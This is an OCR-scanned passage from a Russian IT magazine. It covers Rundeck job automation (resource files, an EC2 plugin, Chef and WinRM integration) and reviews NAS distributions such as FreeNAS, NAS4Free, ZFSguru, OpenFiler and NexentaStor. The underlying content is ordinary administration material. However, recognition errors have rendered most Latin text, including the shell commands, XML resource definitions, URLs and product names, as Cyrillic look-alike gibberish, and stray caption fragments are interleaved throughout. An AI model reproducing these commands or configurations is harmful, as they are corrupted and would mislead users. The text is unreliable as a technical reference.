дает возможность завершить задание. 

По окончании увидим статус (для удобства 
выделяется цветом) и результат выполнения, его 
можно просмотреть в нескольких представле- 
ниях и сохранить как М-файл. Чуть ниже видим 
окно Нізіогу, в котором выводится информация 
по всем заданиям, выполненным в проекте. 

Ссылка «Заѵе Аз боЬ» позволяет сразу сохра- 
нить команду (аб-Иос сотплапб) для последую- 
щего быстрого вызова или создать новую зада- 
чу. Задание отличается возможностью запуска 
по расписанию и отправки предупреждений. Про- 
сто заполняем предложенные поля, указываем 
имя, группу, выбираем проект, вводим описание, 
отправку оповещения о результате, периодич- 
ность выполнения и уровень журналирования. 

Чтобы добавить в группу дополнительные ко- 
манды, скрипты, скрипты с ІІНІ_, запуск локаль- 
ной команды и других заданий, выбираем ссылку 
«Абб зііер». Часть параметров понятна и без опи- 
сания, другие требуют объяснения: 

• флажок «МиШрІе Ехесиііопз?» разрешает од- 
новременное выполнение задания; 

• параметр «ѴѴогкТІоѵѵ: Зігаѣеду:» определяет по- 
рядок выполнения — последовательно (ІЧобе- 
огіепіеб) или параллельно (Зіер-огіепіеб); 

• «ѴѴогкТІоѵѵ: Кеердоіпд:» — установлена в «N 0 », 
то есть в случае ошибки на любом из этапов 



выполнение прерывается, переопределить 
можно, изменив на «Уез». 

Если флажок «Оізраісіп Іо ІЧобез» снят, коман- 
да или задание выполняется только на локальной 
системе. После его установки открывается поле, 
позволяющее задать другие системы и устано- 
вить Іпсіибе/Ехсіибе фильтры (тег, ОС, версия ОС, 
архитектура и другие), в том числе поддержива- 
ются и регулярные выражения. Фильтры мож- 
но сохранять для дальнейшего использования 
(ссылка «Заѵе ІНіз Шег...»). 

По нажатию «Орііопз» активируется безопас- 
ный вывод (позволяет скрыть пароли), здесь мо- 
жем указать дополнительные параметры, кото- 
рые задаются локально (в 63014-формате — Имя: 
значение) или подгружаются с удаленного узла. 

ПОДКЛЮЧАЕМ НОДЫ 

Каждый проект содержит как минимум один 
файл описания ресурсов гезоигсез.хті (Пезоигсе 
МобеІ), но при необходимости можно использо- 
вать несколько файлов, рассортировав их по ката- 
логам или II НІ_. Каждое описание позволяет одно- 
значно определять ноды. Минимально требуется 
указать только имя узла, под которым оно будет 
показано в интерфейсе, и его сетевое имя или 
ІР, опционально задаются и другие параметры — 
теги, ОС, архитектура и другие. В гезоигсез.хті 
уже будет описание локальной системы: 

$ Бибо саі /ѵаг/гипбеск/ргоіесЬ5/<-< 
ехатрІеБ/еѣс/геБоигсвБ . хті 

<ргбЗесЕ> 

<побе пате="1оса1Ііо5І:" безсгір1:іоп=<-< 
"Кипбеск зегѵег побе" 1:а^5="" <-■ 
Іі05І:пате="1оса1Іі05І:" озАгсІп="атб64" <-■ 
ОБРаті1ѵ="ипіх" 05ІМате="І-іпих" <-■ 
озѴ егзі оп="3.2.Ѳ-23-^епег іс" <-■ 



и5егпате="гипбеск"/> 

</ргоіес1=> 

Если учетная запись входит в группу «Абтіп», 
справа вверху появится надпись «Абтіп» и значок 
гаечного ключа. Выбрав этот пункт, можно про- 
смотреть состав групп, добавить плагины, изме- 
нить и экспортировать настройки проекта. 

По умолчанию предлагается получать спи- 
сок ресурсов с удаленного узла, II НІ_ которого 
прописывается в «Пезоигсе МобеІ Зоигсе ІІВІ_». 
Чтобы задать файл ресурсов, каталог, содержа- 
щий файлы с описаниями, скрипт и ІІПІ_, выби- 
раем «Пезоигсе МобеІ Зоигсез». Очень удобно, 
что проект может поддерживать сразу несколько 
источников. Например, часть нод выбирается 
из статического файла, а часть генерируется ССІ- 
скриптом. 

Файл ресурсов — самый простой способ, 
он может быть в формате ХМІ_ или ѴАМІ_. Для не- 
больших проектов достаточно прописать нужное 
количество нод, добавив новую секцию «побе 
пате» в гезоигсез.хті. При помощи дополни- 
тельных параметров изегпате, раззѵѵогб, рогі 
указываются учетная запись и порт для соеди- 
нения с узлом, если они отличаются от установок 
по умолчанию. 

Плагины позволяют расширить эти возмож- 
ности, подключая Пезоигсе МобеІ, прописанные 
в файлах СНеІ, Рирреѣ, Атагоп ЕС2 и других. На- 
пример, плагин Атаіоп ЕС2 ( ЬіІ.Іѵ/ІЗІТОгр ) под- 
ключается очень просто: 

$ зибо ар1:-§е1: іпзііаіі §паб!е 
$ ѵѵ^еі: -с РѵІіІірБ : 7/^іІіІпиЬ . сот/^5СІпие1ег/«— ■ 
пипбеск-ес2-побе5-р1и^іп/апсІііѵе/ч-< 
таБѣег.гір 
$ ипгір таБІіег.гір 

$ сб гипбеск-ес2-побе5-р1и^іп-та5І:ег 
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$ . /§габ1ем 

$ ср . /Ьиі1сІ/ои1:ри1:/1іЬ/гипсІеск-ес2-4-- 
побез-рІи^іп-І.З.іаг /ѵаг/1іЬ/<-< 
гипбеск/ПЬехІ: 

Теперь при выборе «АсІсІ Зоигсе» появится но- 
вый тип «АѴѴЗ ЕС2 Незоигсез». Плагин поддержи- 
вает большое количество дополнительных опций, 
например автоматическую расстановку тегов. 

На данный момент мы подключили все узлы 
и можем выполнять на них команды и скрипты 
через веб-интерфейс или в командной строке. 
Для примера получим список всех текущих ре- 
сурсов проекта и выполним команду по фильтру 
оз-іаплііу: 

$ зисіо бізраігсіі -р ехатріез -ѵ 
$ зисіо бізраіісіі -I оз--Раті1у=ипіх <-■ 

-- иріііте 

ИСПОЛЬЗУЕМ СНЕР 

Основная мощь Пипбеск проявляется в совмест- 
ном использовании с другими средствами ав- 
томатизации, вроде СТіеТ или Рирреі. Принцип 
взаимодействия ничем не отличается от обычной 
работы. При создании задания указываем скрипт, 
в котором расписаны все шаги, или прописываем 
их отдельно при помощи «Абб зіер». Например, 
у нас есть готовый соокЬоокз и два файла (зоіо. 
гЬ, побе^зоп), необходимые для работы сЬеІ-зоІо, 
которые загружены на веб-сервер. Необходи- 
мо установить СІіеТ и выполнить. Прописываем 
в проект несколько новых шагов: 

есЬо "беЬ Іі1=1=р: //аріі.орзсобе. сот/ <-■ 
ргесізе-0.10 таіп" | зибо ~Еее <-■ 
/еііс/аріі/зоипсез . Іізі: .б/орзсобе. Іізі: 

ар1=-^е1= ирбаііе 

аріі-^еі: -у ---Рогсе-уез іпзііаіі <-■ 

орзсобе-кеѵгіп^ сЬе-Р діі: 

сііе-р-зоіо -с Ы=1=р : //ехатріе. сот/зо1о.<-< 
гЬ -і ЬЬЬр: //ехатріе. сот/побе.ізоп <-■ 

-г М:1:р: //ехатріе. сот/сЬе-Р-соокЬоокз .<-■ 
1=аг.^2 

Это самый простой пример. Но если име- 
ем нескольких узлов, отличающихся парой па- 
раметров, нам не нужно все это прописывать 
в соокЬоокз, создавая путаницу. Теперь мы мо- 



жем очень просто разделить общее и частное, 
да и процесс отбора нод стал гораздо проще. 
И что не менее важно, по окончании задания 
администратору в понятной форме выводит- 
ся результат. Вот в этом и есть большой плюс 
Пипбеск. 

Как минимум два плагина позволяют лег- 
ко управлять ѴѴіпбоѵѵз-машинами при помо- 
щи ѴѴіпНМ: Пипбеск ѴѴіпНМ РІидіп ( дііЬиЬ.сот/ 

біоІаЬз/гипбеск-ѵѵіпгт-рІидіп ) и КпіТе ѴѴіпбоѵѵз 
( діШиЬ.сот/орзсобе/кпіІе-ѵѵіпбоѵѵз ). Второй ис- 
пользует утилиту кпіТе из СЬеТ. Ставим: 

$ зибо ^еш іпзііаіі кпіТе-ыіпбошз 

Прописываем в проект информацию 
о ѴѴіпбоѵѵз-сервере: 

$ папо гезоигсез.хті 

<рго іес1=> 

<побе пате="ыіп2008" безсгір1:іоп=<-- 
"Ыіпбоыз зегѵег побе" 1:а^5="ыіп2Ѳ08" <-■ 
Ьоз1:пате="ыіп2008" озАгсІі="Ыіпбоы5" <-■ 
озРаті1у="ыіпбоыз" о5Мате="ыіпбоыз" <-■ 

озѴегзіоп="2008" <-■ 

изегпате="Абтіпіз1:га1:ог" <-> 

ра55ыогб="р@5 5ы0гб" рог1:="80"/> 
</ргоіес1:> 

На Ѵ\/іп2008-сервере настраиваем возмож- 
ность удаленного подключения: 

С;\Ц5егз\Ас!тіпі5І:га1:ог> шіпгт <-■ 
диісксопіп^ -д 

Проверяем из консоли: 

$ ыіпгз -и:абтіпіз1:га1:ог -р: 
р@55ы0пб -г : ІтЕЬр: /Л/іп2008 біг 

$ кпіТе ыіппт -т ыіп2008 -Р <-■ 

'р^ззыѲгб' -р 80 -х Абтіпізітаііог біг 

Если получаем ответ, можем подключать 
к проекту, изменив программу выполнения 
(ІМобеЕхесиІог), используемую по умолчанию: 

$ папо рго^есЬ.ргорегЫез 
зепѵісе . ІМобеЕхесиІіог . бе-РаиІІ: .<-■ 
ргоѵібег=зсгір1:-ехес 



УТИЛИТЫ КОМАНДНОЙ 
СТРОКИ РШЕСК 

Пипбеск включает ряд инструментов 
командной строки, позволяющих вы- 
полнять и отслеживать задания, взаи- 
модействовать с диспетчером очереди. 
Их можно использовать как альтернативу 
СШ в своих скриптах: 

• бізраІсЬ — выполнение команд 
и сценариев; 

• гб-диеие — запрос и остановка зада- 
ний в очереди; 

• гб-іоЬз — просмотр заданий и загруз- 
ка в файл; 

• шп — выполнение сохраненного за- 
дания; 

• гб-ргоіесі — создание нового проекта; 

• гб-зеіир — перенастройка Пипбеск. 



рІи^іп . зсгіріі-ехес . бе-РаиІІ: . соттапб^ 
кпі-Ре ыіпгт -т ${побе. ІіозІіпатеТ -Р <-■ 
'${побе.ра55ыогб}' -р ${побе. рогЕ}-х 
${побе.изегпате} ${ехес . соттапб} 

Теперь можно отдавать команды удаленной 
ѴѴі п б оѵѵз - системе . 

На сайте проекта даны ссылки не на все пла- 
гины. Поискав в интернете, можно найти много 
полезного. Например, скрипт для удобного бэка- 
па и восстановления заданий Пипбеск — гипбеск- 
Ьаскир ( ). Однако при выборе плаги- 

на следует проверять, с какой версией Пипбеск 
он будет работать. Некоторые плагины давно 
не поддерживаются и не совместимы с послед- 
ними релизами Пипбеск. 

ЗАКЛЮЧЕНИЕ 

Использование Пипбеск заметно упрощает за- 
дачу админу, позволяя гибко определять ноды 
и задачи, отслеживать статус их выполнения. 
Но, как и любое другое средство управления, 
Пипбеск также требует внимания. НЕ 




тс [гімуі ^ііір-г- тл сЫ гав]Е^гаг/саЕІп в/лрг.'аггЫигс 

НІі- ЪМ Ѵи-*і ЭДИСІі ТічПнгмІ МНр 

извг^изег-тасЬте зисіо бізраІсЬ -р ехатріез -ѵ 

[зисіо] раззюогй ^ог изег; 
ѵті : 

озРатіІу: ипіх 
іа^з: ту зді 
изегпате: гипгіеск 
озАгсЬ : атсІ64 

озѴегзіоп: 3 , 2 . 0-23-^епегіс 
безсгірігіоп : Му5рІ_ зегѵег посіе 
побепате: ѵті 
Ьозігпате: ѵті 
озНате; !_іпих 
ІосаІИозі : 
сааз: " 
озРатіІу : ипіх 
изегпате : гипбеск 
озАгсЬ; атгі64 

озѴегзіоп: 3.2.С~23-Е еп егіс 
безсгіргіоп: Яипбеек зегѵег пойе 
побепате: ІоеаІІіозі: 

Нозипате: ІосаІИозс 
озМате: Ііпих 



Добавляем новый источник Пезоигсе Мосіе 



Просмотр узлов проекта в командной строке 
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В небольших органи- 
зациях востребованы 
простые в настройке 
и обслуживании спе- 
циализированные 
файл-серверы, задача 
которых, по сравнению 
с более продвинутыми 
решениями, упрощена 
до минимума — хра- 
нение данных и предо- 
ставление сетевого 
доступа к ним. 
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РгееЫАЗ 8.3.1 



Сайт: ігеепаз.ога 

Платформа: РгееВЗЭ 8.3 
Системные требования: СРІІ 
х86/х64, РАМ 128+ Мб, И00 500 Мб 

Архитектура: х86, х64 
Русификация интерфейса: да 
Лицензия: ВЗЭ 

Дистрибутив РгееМАЗ (Ргее ЫАЗ Зегѵег) постро- 
ен на базе РгееВЗЭ, при этом номер версии со- 
впадает с номером релиза РгееВЗЭ, на основе 
которого он создан. Изначально проект разви- 
вался под руководством Оливье Кошар-Лаббе 
(ОІіѵіег СосІіагсІ-І_аЫэё), затем к нему подсо- 
единилась группа добровольцев, что придало 
серьезный импульс развитию проекта. Сегодня 
РгееЫАЗ находится под патронажем компании 
іХзузІеплз, занимающейся разработкой аппа- 
ратных ЫАЗ на его основе. Кстати, эта компания 
поддерживает РС-ВЗЭ и способствует разви- 
тию 2Р8 во РгееВЗЭ. 

Текущая версия РгееЫАЗ в качестве ФС ис- 
пользует 2Р8 (пул версии 28), среди особен- 
ностей которой: поддержка автоматического 
распознавания и объединения дубликатов дан- 
ных, реализация РІАЮ-23 (программный РАЮ 
7, 2РЗ хранит три копии структур, обеспечива- 
ющих целостность), возможность разделения 
отзеркалированного грооі-раздела на несколь- 
ко раздельных пулов (грооі зрІИ:), импорт пула 
в режиме только для чтения, ускорение работы 
со снапшотами и другое. Например, функция 
2РЗ Зпарзііоііз позволяет создать и отправить 
на удаленную систему снимок локальной ФС (и 
обновлять в случае изменений), а при сбое бы- 
стро восстановить работоспособность. 

В релизе РгееІМАЗ 8.3.1 реализовано шиф- 
рование 2РЗ, теперь можно надежно защитить 
данные без привлечения сторонних решений. 
Если процессор поддерживает инструкции 
АЕЗ-ІМІ, работа модуля шифрования не будет 
сказываться на производительности. Управ- 
ление ключами очень простое, подключить за- 
тем такой диск на другом сервере не составит 
труда. 



Для доступа к хранилищу заявлена под- 
держка ІЗСЗІ, РТР/РТР5/ТРТР, І\ІР5, ЗатЬа, АРР 
(Арріе Ріііпд РгоіосоІ), 83Н и синхронизация по- 
средством ВЗѴІМС. Возможна организация про- 
граммного РАЮ (0, 1,5,6,10, 60), РАЮ-21 /22/23, 
импорт дисков, отформатированных в РАТ, 
ІМТРЗ, ех1:2/3, ІІР5 РАЮ. Для авторизации клиен- 
тов используется ШАР / Асйѵе Эігесіюгу. 

Реализованы и другие полезные функции: 
ЗІММР-мониторинг, тест дисков при помощи 
8.М.А.Р.Т., отправка журналов на удаленный 
зузіодсі и отчетов по электронной почте. Адми- 
нистратор получает наглядные графики исполь- 
зования ресурсов ІМАЗ-сервера. 

С версии 8.2.0 поддерживаются плагины, 
которые позволяют легко расширить возможно- 
сти системы. Аддоны основаны на РгееВЗЭ іаііз 
и пакетах РВІ с РС-ВЗЭ и полностью изолируют 
дополнения от основной системы. В настоящее 
время представлены расширения, реализую- 
щие поддержку ВНТоггепІ, потокового ЭААР- 
сервера (на основе РігеТІу) и МіпЮІ_ЫА. 

Файлы конфигурации и пользовательские 
данные хранятся на отдельном дисковом раз- 
деле баіа, в некоторых конфигурациях это не- 
удобно. 

Все функции полностью настраиваются че- 
рез локализованный и интуитивно понятный 
веб-интерфейс (написан с использованием 
ЭІапдо). Также через веб можно подключиться 
к зТіеІІ . 

РгееІМАЗ распространяется в виде устано- 
вочных х86/х64 ІЗО-образов, образов для ІІЗВ. 
На странице загрузки доступны и образы обнов- 
лений, пакет плагинов. Системные требования, 
в общем-то, невысоки, но для каждой функции 
2РЗ нужны дополнительные мощности и боль- 
шое количество свободной памяти. 

Установщик, как полагается во РгееВЗЭ, тек- 
стовый, но работа с ним каких-либо неудобств 
не вызывает. Необходимо лишь выбрать из спи- 
ска диск, на который ставить ОС, и согласиться 
с тем, что данные будут уничтожены, после пе- 
резагрузки можно настроить сеть при помощи 
конфигуратора (/еіс/пеісіі). 



РгееМАЗ 
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ОСОБЕННОСТИ 2Р$ 
Ѵ28 В РРЕЕВЗБ 

Файловая система 2РЗ не является 
«родной» для РгееВЗЭ, поддержка 
долгое время существовала в виде 
патча, затем код был интегрирован 
в основную ветку РгееВЗЭ 8.3 и 9.0. 

В настоящее время обеспечивается: 

• Поддержка автоматического 
распознавания и объединения 
дубликатов данных, которые 
будут сохранены на физиче- 
ский носитель только один раз. 
Это позволит существенно 
уменьшить занимаемое дис- 
ковое пространство и повысить 
производительность. Но нужно 
помнить, что на каждый блок 
ФС 2Р8 использует примерно 
512 байт в памяти для таблицы 
дедупликации, если задать ма- 
ленький размер блока, то ресурс 
быстро исчерпается и 2Р5 будет 
тормозить. 

• Поддержка РІАЮ-23 — вари- 
анта РІАЮ-2 с хранением трех 
копий, отвечающих за обеспе- 
чение целостности структур. 

Это позволяет значительно 
повысить надежность хранения 
по сравнению с РІАЮ-режимами 
с двойным дублированием — 
ПАЮ-6 и ПАЮ-22, так как обе- 
спечивается целостность данных 
при одновременном выходе 

из строя сразу трех дисков. 

• Поддержка команды грооі зрііі, 
предназначенной для разбиения 
отзеркалированного грооі- 
раздела на несколько отдельных 
пулов. Позволяет упростить 
клонирование данных, когда 

к зеркалу добавляется несколько 
дисков, производится синхро- 
низация и диски исключаются 
из пула. С использованием грооі 
зрІИ очень просто исключить 
диск из пула и создать на его 
основе новый пул. 

• Ведение счетчика ссылок 
на снапшот для более гиб- 
кого управления удалением 
неиспользуемых снапшотов. 
Увеличив счетчик, пользователь 
может пометить, что снапшот ис- 
пользуется и его нельзя удалять. 

• Импорт пула в режиме только 
для чтения. 

• Утилита гТз сііТТ отображает 
различия между двумя 2РЗ- 
снапшотами или между снапшо- 
том и текущим состоянием ФС. 

• Команда грооі ітрогі: -Р позволя- 
ет «перемотать» поврежденный 
пул к состоянию, соответству- 
ющему более ранней группе 
транзакций. 



Интерфейс РгееЫАЗ позволяет контролировать все аспекты работы сервера 
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ХАКЕР 08 /175/ 2013 



ЫА$4Ргее9.1.0.1 



Сайт: паз4ігее.ога 

Платформа: РгееВЗй 8.3 
Системные требования: СРІІ 
х86/х64, РАМ 256+ Мб, ИОО 500 Мб 

Архитектура: х86, х64 
Русификация интерфейса: да 
Лицензия: ВЗй 

ЫА34Ргее был основан на кодах РгееІЧАЗ 0.7, ког- 
да прародитель (включая название) перешел под 
крыло іХзузІеплз и началась его коммерциализа- 
ция. Ориентирован в первую очередь для приме- 
нения во встроенных системах, хотя не ограничен 
в возможностях установки на обычный компьютер 
или виртуальную машину. 

Текущая версия построена на базе РгееВЗй 
9.1, в качестве ФС использует 2РЗѵ28 (включая 
РАЮ-21 /22/23), ІІР5, ех*2/3, РАТ, ІМТР5, под- 
держивает программный РАЮ (0, 1, 5 и другие) 
и шифрование диска. Обмен данными возможен 
по протоколам ЗМВ/СІР8, РТР, ТРТР, ІЧР5, АРР, 
ІЗСЗІ (іпіііаіог и Іагдеі), ЗСР (83Н), ВИТоггепІ, 
НА8Т, САРР, синхронизация данных посредством 
РЗѴІМС (клиент/сервер) или ІІпізоп. Поддержи- 
вает ІІРпР (на базе Риррез), сервер іТипез/РААР 
(Рі геТІу), протоколы САРР, НАЗТ, ѴІ_АЫ и ѴѴаке Оп 
І_АІ\І. Управление доступом производится на ос- 
нове пользователей и групп ІІІМІХ. Для аутентифи- 
кации используется внутренняя база и средства 
АсИѵе Оігесіогу и ШАР. 

Состояние хардов отслеживается при помощи 
З.М.А.Р.Т, реализованы ЗЫМР, отправка сообще- 
ний Зузіод, контроль состояния ІІРЗ. В случае 
проблем админ получает уведомление по етаіі. 
Поддерживается весь спектр оборудования, со- 




вместимый с РгееВЗО. Все это полностью настра- 
ивается через веб-интерфейс. 

Дистрибутив может быть установлен 
как на обычный хард, так и на Сотрасі: РІазІі, ІІЗВ, 
ЗЗР, также может работать с І_іѵеС0/І_іѵеІІЗВ. Си- 
стему не следует устанавливать на диск емкостью 
более 2 Тб, такой диск можно использовать толь- 
ко для хранения данных. 

Все настройки сохраняются в одном ХМІ_- 
файле (сопТід.хтІ), поэтому их очень просто пе- 
ренести на другую систему. Такой файл можно 
поместить на флешку, тогда он подхватится авто- 
матически во время инсталляции, или импорти- 
ровать через веб-интерфейс. 

Работа с І\ІА54Ргее во многом напоминает 
РгееІЧАЗ старых версий. Например, по умолчанию 
устанавливается ІР-адрес 192.168.1.250. После 



загрузки ОС появляется консольное меню, позво- 
ляющее сконфигурировать сетевые интерфейсы, 
сменить ІР, установить систему, выйти в зИеІІ, 
сбросить пароль веб-администратора (по умол- 
чанию учетки асітіп и гооі: имеют пароль паз4Тгее) 
и так далее. Интерфейс, кроме прочего, предо- 
ставляет возможность некоторых системных на- 
строек, имеет редактор файлов, файловый ме- 
неджер, возможность отправки команд оболочке, 
инструменты сетевой диагностики, тестирование 
пропускной способности сети (при помощи ІрегТ). 
По умолчанию все сервисы отключены, админи- 
стратор самостоятельно запускает и настраивает 
то, что необходимо. 

В ѴѴікі ( Ьі{.Іѵ/17г5сЮН ) описано, как можно пе- 
ресобрать дистрибутив под себя, добавив в него 
нужные приложения. 



2Р$дигіі 0.2-Ьеіа8 



Сайт: гізаиги.сот 

Платформа: РгееВЗй 9.1 
Системные требования: СРІІ 
х64, ПАМ 1+ Гб, НЮ0 2+Г6 

Архитектура: х64 
Русификация интерфейса: нет 
Лицензия: ВЗй 

Проект относительно молодой и ориентирован 
в настоящее время скорее на домашних поль- 
зователей и небольшие организации. В каче- 
стве файловой системы используется 2РЗѵ28, 
поддерживаются ІІРЗ и ех1:2/3 (после установки 
е2^зргодз). Возможно создание программного 
ПАЮ (0, 1, 5, ЛВОО, 5+0, 5+1, 0+1, 1+0 и так да- 
лее), ПАЮ-21/22. Доступ к данным реализуется 
посредством ІЗСЗІ (іпШаіог и Іагдеѣ), ЗМВ/СІР8, 
І\ІРЗ, 88Н, НЗѴІМС (клиент и сервер) и АРР. Под- 
держиваются специфические функции 2Р8: де- 
дупликация, снапшоты и сжатие, которые мож- 
но настроить через интерфейс для каждой ФС. 
Возможно использовать ЗЗй в качестве кеши- 
рующего устройства (2Р8 І.2АИС), что позволит 
повысить производительность при операциях 
чтения. Предусмотрено применение резервных 
дисков, которые будут активированы автомати- 
чески в случае выхода из строя одного из дисков 
массива. 

Поддерживается управление учетными за- 
писями пользователей и групп, аутентифика- 
ция средствами Асйѵе Оігесіогу и ШАР. Отчеты 
8.М.А.П.Т., монитор І/О и Ьепсіітагк позволяют 
контролировать состояние и производительность 



жестких дисков. Администратор может получать 
етаіі о критических параметрах (в поставку вхо- 
дит ЗепсІтаіІ), отправку журналов на удаленный 
зузіодсі. 

Функции легко расширить при помощи паке- 
тов, которые устанавливаются простым щелчком. 
В настоящее время доступно восемь категорий, 
в которых насчитывается около 70 приложений — 
ІЗСЗІ -Іагдеі:, ОѵѵпСІоисІ, несколько РТР-серверов, 
ВИТоггепІ, антивирус СІатАѴ и другие. 

Поддерживается весь спектр оборудования, 
совместимый с РгееВЗй 9.1, в том числе многие 
ѴѴі-Рі сетевые карты и РІАЮ-контроллеры. 

Для управления используется веб-интерфейс 
(написан на РНР, в качестве веб-сервера задей- 
ствован ІідІійрсІ), по виду напоминает настольное 
приложение. Настроек в нем много, они разбро- 
саны по меню и подменю, можно изменить в том 
числе и некоторые системные параметры, есть 
веб-консоль для ввода команд оболочки и про- 
смотра файлов на диске. Применение 2Р8 также 
накладывает свой отпечаток. Поэтому некоторое 
время придется потратить, чтобы освоиться. Да- 
лее проблем в работе обычно не возникает. Чтобы 
расшарить ФС, достаточно ее выбрать и нажать 
соответствующую ссылку, будет показана коман- 
да, которую можно тут же подправить. 

2РЗдиш реализован в виде ІЗО-образа, под- 
держивающего установку на жесткий диск, ІІЗВ 
или виртуальную машину. Возможна загрузка 
и работа с ЫѵеСО. Веб-интерфейс доступен от- 
дельным архивом, который можно использовать 
для установки на РгееВЗР. На сайте есть все не- 



А2РЗ 

щЩШШШЯВЛ 




Настройка файловой системы в 2РЗдиги 



обходимые инструкции по установке. Таким обра- 
зом, можно легко собрать ІЧАЗ-сервер под любые 
условия, обеспечив удобное управление. 

Программа установки несколько отличается 
от других решений. Образ выгружается в ОЗУ, 
поэтому желательно наличие 1 Гб памяти, иначе 
процесс может завершиться с ошибкой. После 
загрузки доступно меню, позволяющее выйти 
в зТіеІІ , узнать ІР, сбросить настройки веба. Да- 
лее следует подключиться к серверу при по- 
мощи веб-браузера и произвести установку, 
воспользовавшись подсказками визарда, кото- 
рый поможет настроить доступ к серверу ІЧАЗ, 
аутентификацию, настроить 2РЗ рооі, отправить 
в сообщество 2Р5диш данные об используемом 
оборудовании. 
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Нас было семь 



I 37 



ОрепТіІег 2.99 







ѴѴАІШШС 

При использовании 2Р5 
нужно следить за до- 
ступным свободным 
местом: когда его 
остается меньше 10%, 
производительность 
сильно падает. 



ОрепТіІег: для удобного управления ресурсами дисков их объединяют в общий пул 



Сайт: ооепТИег.сот 

Платформа: гРаІІі Ыпих 
Системные требования: СРІІ 
х64 1 ,6 ГГц, РАМ 2+ Гб, ИОО 8+ Гб 
Архитектура: х64 
Русификация интерфейса: нет 
Лицензия: ОЫІІ СРІ_ 

Первые версии дистрибутива, начало развития 
которого положено в 2003 году, базировались 
на СепЮЗ, но впоследствии разработчики оста- 
новили выбор на сервисе гВиіІсІег Опііпе дис- 
трибутива гРаІИ. Текущая версия позволяет ис- 
пользовать компьютер в качестве бэкенда ѴМ. 
Поддерживается НЬге СНаппеІ, ІЗСЗІ (іпШаІог 
и Іагдеі) и СЫВЭ (сетевое блочное устройство). 
Обеспечивается возможность простого управ- 
ления хранением данных, поддержка больших 
хранилищ 60+ Тб, роіпі-іп-ііте снапшоты. Реа- 
лизована синхронная и асинхронная поблочная 
репликация данных между узлами при помощи 
В5ѴІМС (Ветоіе ВІоск Реріісабоп). 

Кроме того, поддерживаются все сетевые 
протоколы, используемые сегодня для переда- 
чи файлов: СІР5/ЗМВ (с «теневыми» копиями), 
ЫР5ѵЗ/ѵ4 (с поддержкой АСІ_), НТТР/ЭАѴ, РТР, 
программный РАЮ всех популярных уровней (0, 
1, 5, 6 и 10) и І_ѴМ2. В качестве файловой систе- 
мы можно выбрать ехіЗ и ХР8 (рекомендуются, 
форматирование производится через СІІІ) или 
РеізегРЗ и ОРЗ (форматирование вручную). 

Чтобы удобнее управлять ресурсами дисков, 
их объединяют в общий пул (Оупапліс Ѵоіштіе 
Аддгедабоп), который затем «нарезают» по на- 
значению (І_одісаІ и РІТС Ѵоіиплез). 

Аутентификация пользователей может про- 
изводиться средствами РАМ (настраивается че- 
рез веб), N18, ШАР, НезіосІ, Асбѵе Эігесіюгу и МТ4 
домена, причем можно задействовать одновре- 
менно несколько механизмов. Политика досту- 
па к ресурсам реализуется на основе членства 
в группе, ІР-адреса или принадлежности к сети. 
Возможна автоматическая активация персональ- 
ных (Йоте) ресурсов зарегистрированных поль- 
зователей и гостевых каталогов. Дисковые квоты 
задаются для групп, персонально и отдельно 
для гостей. Это позволяет реализовать любые 



варианты. Для быстрой настройки квот использу- 
ются шаблоны. 

ОрепТіІег содержит ряд приложений, выпуска- 
емых под свободными лицензиями, — АрасНе, 
ЗатЬа, Васиіа и другие. Поддерживается управ- 
ление ІІР5. Есть возможность объединения не- 
скольких ОрепТіІег в кластер высокой доступности 
(НідГі АѵаіІаЬИіТу). 

Все настройки осуществляются через понят- 
ный, хотя и не локализованный веб-интерфейс 
(доступен на 446-м порту) или через 53Н. Ос- 
новные установки сервисов представлены в виде 
АсІтіпізТгаТіѵе Тазкз, позволяющих выполнить все 
необходимое поэтапно. После выбора меню вни- 
зу открывается подменю, основные пункты выби- 
раются в поле справа. Некоторые продвинутые 
настройки убраны и открываются дополнительно 
(ЕхреП Ѵіеѵѵ). Для управления настройками ис- 
пользуется логин ОрепТіІег и пароль раззѵѵогсі, 
пользователь гооТ (создается при установке) че- 
рез веб может только настраивать квоты. 

Изначально проект нацелен на коммерциали- 
зацию, поэтому внятная документация отсутству- 



ет. К счастью, в Сети можно найти ряд руководств, 
подготовленных пользователями. Поддержка 
возможна через форум, список рассылки или 
в ІПС-канале. За плату предоставляются офици- 
альная поддержка и расширенные возможности. 

Официально поддерживается установка 
в виртуальную среду СИтіх ХепЗегѵег и ѴМѵѵаге 
ѵЗрИеге. Последний релиз доступен только 
в виде ІЗО-образа под х86_64, но в случае необ- 
ходимости использования оборудования на х86 
или виртуальных машин ѴМѵѵаге можно обра- 
тить внимание на предыдущий релиз. В качестве 
установщика используется усеченный вариант 
Апасопба. Сам процесс установки занимает де- 
сять минут и понятен даже новичку. Можно вы- 
бирать между графическим или текстовым вари- 
антами. 

Последний релиз датирован 2011 годом, 
но то, что есть, вполне актуально на сегодняшний 
день, и проект по-прежнему считается активным. 
Однако, учитывая, что гРаІИ канул в Лету, обно- 
вить при необходимости компоненты ОрепТіІег 
будет непросто. 



ЫехепіаЗіог 3. 1 .3.5 



Сайт: пехепТазТог.ога. пехепТа. 
сот/сого/пехепТазТог 

Платформа: ОрепЗоІагіз/ІІІитоз 

Системные требования: СРІІ 
х32 (рекомендуется х64), РАМ 1 Гб, 

ГЮЭ 2x10+ Гб 
Архитектура: х86, х64 
Русификация интерфейса: нет 
Лицензия: СоттипіТу ЕбШоп 
ЕІІІ_А / коммерческая 

Дистрибутив для создания сетевых хранилищ, 
который сочетает в себе ядро ОрепЗоІагіз 
и программное окружение ІІЬипТи 8.04 (в по- 
следующем планируется переход на ядро, 
разрабатываемое в рамках ІІІиплоз, и ОеЫап 
Зциееге). В качестве файловой системы ис- 
пользуется 2Р5, для работы с пакетами за- 
действован пакетный менеджер АРТ (штатный 
псрЗ-репозиторий предоставляет более 12 
тысяч пакетов). Есть и своя специфика. При ра- 



боте ар1:-§е1: создаются контрольные точки, 
на которые можно при желании откатиться. 
Также аріі-сіопе позволяет клонировать систе- 
му для обновления в отдельный 2Р5-пул, после 
чего переключить рабочую систему в обновлен- 
ное окружение. 

Поддерживается все, что присуще 2Р5: сжа- 
тие и дедупликация, синхронная и асинхронная 
репликация, поиск в снапшоте, отсутствуют ли- 
миты на размеры файла, на количество снапшо- 
тов и сору-оп-ѵѵгііе клонов. Предусмотрена воз- 
можность использования кеша на ЗЗЭ (НуЬгісІ 
Зіогаде Рооіз). Реализована поддержка ком- 
плекса технологий ѴААІ (ѵЗІогаде АРІ Тог Аггау 
ІпІедгаИоп), предназначенного для передачи 
некоторых операций виртуальных машин по ра- 
боте с дисками на сторону массива с целью по- 
вышения производительности. 

